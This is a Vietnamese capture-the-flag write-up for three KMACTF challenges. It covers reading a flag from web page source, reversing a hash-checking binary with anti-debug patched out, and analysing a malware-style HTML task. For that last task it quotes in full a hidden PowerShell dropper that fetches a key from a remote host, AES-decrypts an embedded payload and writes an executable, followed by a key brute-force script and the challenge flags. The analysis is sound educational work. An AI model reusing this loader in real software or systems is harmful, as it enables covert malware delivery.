Wu vu vow - HackMD

# Wu vu vơ ## pickleball f12 đọc src ta sẽ thấy flag ở cái phần sau `robots.txt` ![image](https://hackmd.io/_uploads/BJ-twnOjA.png) `index-f7659d98.js` ![image](https://hackmd.io/_uploads/rk_cvndj0.png) `index-e2ac387f.css` ![image](https://hackmd.io/_uploads/HJpovhOjA.png) > KMACTF{p1Ckleb4ll_WitH-uU_piCklepal_5a6b89113abb} ## simple math Ở đầu chương trình có 1 đoạn code xử lý như này, chương trình kiểm tra kí tự đầu tiên của chuỗi mà ta nhập vào xem có phải kí tự `E` không rồi xử lý gì đó, nhưng cuối cùng chỉ là chủ ý làm nhiễu ta của author ![image](https://hackmd.io/_uploads/rktUu3dsR.png) `Nhập chuỗi đầu vào có kí tự E ở đầu` ![image](https://hackmd.io/_uploads/H10COhOjC.png) String trả về của chương trình, khi mình là thì string ở đây là `ban_da_bi_lua!!!!` ![image](https://hackmd.io/_uploads/Sy_HK2di0.png) Tiếp theo chương trình được kiểm tra giá trị đầu tiên của biến `v19` mà `v19` là kết quả trả về của hàm `sub_7FF661C12040` ![image](https://hackmd.io/_uploads/HJMYtn_jC.png) `sub_7FF661C12040` ![image](https://hackmd.io/_uploads/HJh1cn_oA.png) Ở đây có 1 đoạn anti-debug, thay đổi giá trị trả về của `v19` nếu như ta thực hiện debug, patch bỏ đoạn đó là được ![image](https://hackmd.io/_uploads/Bk_Vq3_jA.png) Bên dưới là hàm xử lý đúng để check flag, chương trình sẽ thực hiện hash `4` kí tự 1 của input ta nhập vào và so sánh với chuỗi hash đúng `hash của chương trình` ![image](https://hackmd.io/_uploads/ByW7inus0.png) Làn lần lượt như vậy là ta có flag > KMACTF{SUperidol笑容都沒你的甜八月正午的陽光都沒你耀眼熱愛105度的你滴滴清純的蒸餾水} ![image](https://hackmd.io/_uploads/H1-6j3_o0.png) ## ℵ Author cung cấp cho ta 2 file html, xem nó có gì ![image](https://hackmd.io/_uploads/BJ8T32uiA.png) Khi thực hiện thao tác `Download` ra đưuọc redirect sang 1 trang khác trong khoảng vài giây rồi lại chuyển hướng đến trang này `redirect lần 1` ![image](https://hackmd.io/_uploads/rJ9Gan_s0.png) `redirect lần 2` ![image](https://hackmd.io/_uploads/BJNNan_jA.png) `Ctrl + U` file `index.html` ![image](https://hackmd.io/_uploads/SJMJRn_jR.png) không thấy gì đặc biệt `Ctrl + U` file `director.html` ![image](https://hackmd.io/_uploads/BJLdRh_sA.png) Có thấy 2 giá trị được ẩn đi dưới dạng `base64` khá là sú ![image](https://hackmd.io/_uploads/r1hFC3Oj0.png) ``` $cne = "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" $cne2_get_bytes = ([System.Convert]::FromBase64String($cne)) $MemoryStream = New-Object "System.IO.MemoryStream" $MemoryStream.Write($cne2_get_bytes, 0, $cne2_get_bytes.Length) $MemoryStream.Seek(0,0) | Out-Null $DeflateStream = New-Object System.IO.Compression.DeflateStream($MemoryStream, [System.IO.Compression.CompressionMode]::Decompress) $StreamReader = New-Object System.IO.StreamReader($DeflateStream) $enc = '' while ($line = $StreamReader.Readline()){ $enc += $line } $enc2 = [System.Convert]::FromBase64String($enc) $AES = New-Object "System.Security.Cryptography.AesManaged" $AES.Mode = [System.Security.Cryptography.CipherMode]::CBC $AES.Padding = [System.Security.Cryptography.PaddingMode]::Zeros $AES.BlockSize = 128 $xb = Invoke-WebRequest -Uri 'http://192.168.1.69/key' $xxb = [Convert]::ToByte($xb.Content) $AES.KeySize = 254 + $xxb.Count $b = [byte[]] -split ("bce7b9e8b581b1a2ada7aaaba7afcdb3cbb4c8b9de80da85d586d28a9e919b92" -replace '..', '0x$& ') $nB = @() for ($i = 0; $i -lt $b.Count; $i++) { $nB += $b[$i] -bxor $xxb[$i % $xxb.Length]; } $AES.IV = [byte[]] -split ("3f4528482b4d6251655368566d597133" -replace '..', '0x$& ') $AES.Key = $nB $Decryptor = $AES.CreateDecryptor() $result = $Decryptor.TransformFinalBlock($enc2, 0, $enc2.Length) $Decryptor.Dispose() Set-Content Lolita.exe -Value $result -Encoding byte $DeflateStream.Flush() $DeflateStream.Close() ``` Chương trình này thực hiện giải mã đống `base64` bên trên bằng thuật toán `AES mode CBC`. Nhưng có 1 vấn đề ở đây là ta chưa biết được key sau khi xor là gì. Để ý ở đoạn này, ta có thể kết luận được rằng đọ dài của chuỗi mà xor với key là 2 byte (254 + **2** = 256) ![image](https://hackmd.io/_uploads/HJ0ZgpdiR.png) Script brute-force key ``` $cne = "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" $cne2_get_bytes = ([System.Convert]::FromBase64String($cne)) $MemoryStream = New-Object "System.IO.MemoryStream" $MemoryStream.Write($cne2_get_bytes, 0, $cne2_get_bytes.Length) $MemoryStream.Seek(0,0) | Out-Null $DeflateStream = New-Object System.IO.Compression.DeflateStream($MemoryStream, [System.IO.Compression.CompressionMode]::Decompress) $StreamReader = New-Object System.IO.StreamReader($DeflateStream) $enc = '' while ($line = $StreamReader.Readline()){ $enc += $line } $enc2 = [System.Convert]::FromBase64String($enc) $AES = New-Object "System.Security.Cryptography.AesManaged" $AES.Mode = [System.Security.Cryptography.CipherMode]::CBC $AES.Padding = [System.Security.Cryptography.PaddingMode]::Zeros $AES.BlockSize = 128 # Brute force 2-byte key for ($k1 = 0; $k1 -le 255; $k1++) { for ($k2 = 0; $k2 -le 255; $k2++) { $xxb = [byte[]]@($k1, $k2) $AES.KeySize = 254 + $xxb.Count $b = [byte[]] -split ("bce7b9e8b581b1a2ada7aaaba7afcdb3cbb4c8b9de80da85d586d28a9e919b92" -replace '..', '0x$& ') $nB = @() for ($i = 0; $i -lt $b.Count; $i++) { $nB += $b[$i] -bxor $xxb[$i % $xxb.Length]; } $AES.IV = [byte[]] -split ("3f4528482b4d6251655368566d597133" -replace '..', '0x$& ') $AES.Key = $nB $Decryptor = $AES.CreateDecryptor() try { $result = $Decryptor.TransformFinalBlock($enc2, 0, $enc2.Length) $Decryptor.Dispose() # Check if the header matches "50450000" if ($result.Length -ge 2 -and $result[0] -eq 0x4D -and $result[1] -eq 0x5A) { Set-Content Lolita.exe -Value $result -Encoding byte Write-Output "Successful key: $($xxb[0]), $($xxb[1])" Write-Output "File written to Lolita.exe" break 2 } } catch { $Decryptor.Dispose() } } } $DeflateStream.Flush() $DeflateStream.Close() ``` Sau khi decrypt thành công ta được file như sau ![image](https://hackmd.io/_uploads/ryptxTOoR.png) Set cho eip nhảy vào graph bên trái là chương trình sẽ decrypt cho ta flag ![image](https://hackmd.io/_uploads/B19y-puiR.png) > KMACTF{benj_thich_loli_va_goi_om}